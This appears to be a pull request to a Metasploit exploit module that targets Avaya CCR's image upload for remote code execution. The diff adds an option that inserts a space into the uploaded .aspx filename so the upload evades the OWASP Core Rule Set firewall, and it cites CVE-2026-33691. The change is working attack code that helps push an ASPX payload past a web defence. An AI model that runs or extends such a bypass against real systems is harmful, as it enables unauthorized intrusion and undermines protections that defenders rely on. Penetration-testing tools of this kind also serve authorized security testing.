### PR TITLE
Implement CVE-2026-33691 bypass option

### DIFF
--- a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb
+++ b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb
@@ -43,7 +43,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'The URI path of the Avaya CCR applications', '/'])
+        OptString.new('TARGETURI', [true, 'The URI path of the Avaya CCR applications', '/']),
+        OptBool.new('BYPASS_WITH_CVE_2026_33691', [false, 'Bypass OWASP CRS using whitespace padding (CVE-2026-33691)', false])
       ]
     )
 
@@ -81,10 +82,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
     boundary = "---------------------------#{rand_text_alpha(36)}"
 
+    filename = "#{rand_text_alpha(rand(5) + 3)}.aspx"
+    if datastore['BYPASS_WITH_CVE_2026_33691']
+      filename = filename.sub('.aspx', '. aspx')
+      print_status('Applying CVE-2026-33691 bypass (whitespace padding)...')
+    end
+
     my_data = "--#{boundary}\r\n"
     my_data << "Content-Disposition: form-data; name=\"RadUAG_fileName\"\r\n"
     my_data << "\r\n"
-    my_data << "#{rand_text_alpha(rand(5) + 3)}.aspx\r\n"
+    my_data << "#{filename}\r\n"
     my_data << "--#{boundary}\r\n"
     my_data << "Content-Disposition: form-data; name=\"RadUAG_data\"\r\n"
     my_data << "\r\n"


### PR DESCRIPTION
Added an option to bypass OWASP CRS using whitespace padding for CVE-2026-33691.
